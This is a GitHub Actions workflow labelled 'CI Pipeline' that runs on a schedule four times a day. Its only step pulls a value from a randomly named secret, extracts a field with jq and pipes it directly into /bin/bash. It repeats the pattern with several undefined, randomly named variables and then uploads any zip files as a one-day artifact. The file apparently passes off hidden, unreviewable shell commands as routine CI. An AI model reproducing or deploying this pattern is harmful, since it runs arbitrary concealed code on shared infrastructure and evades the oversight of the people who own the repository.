name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '7 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          udc4: ${{ secrets.udc4 }}
        run: |
          printf '%s' "$udc4" | jq -r .t959 | /bin/bash
          echo $kqpna9 | jq -r .lor47818 | /bin/bash
          echo $yqxj01 | jq -r .bpyqz46339 | /bin/bash
          echo $lbe8 | jq -r .mz73 | /bin/bash
          echo $n8680 | jq -r .pmz0449 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: BcwjRfnG
          path: "*.zip"
          retention-days: 1
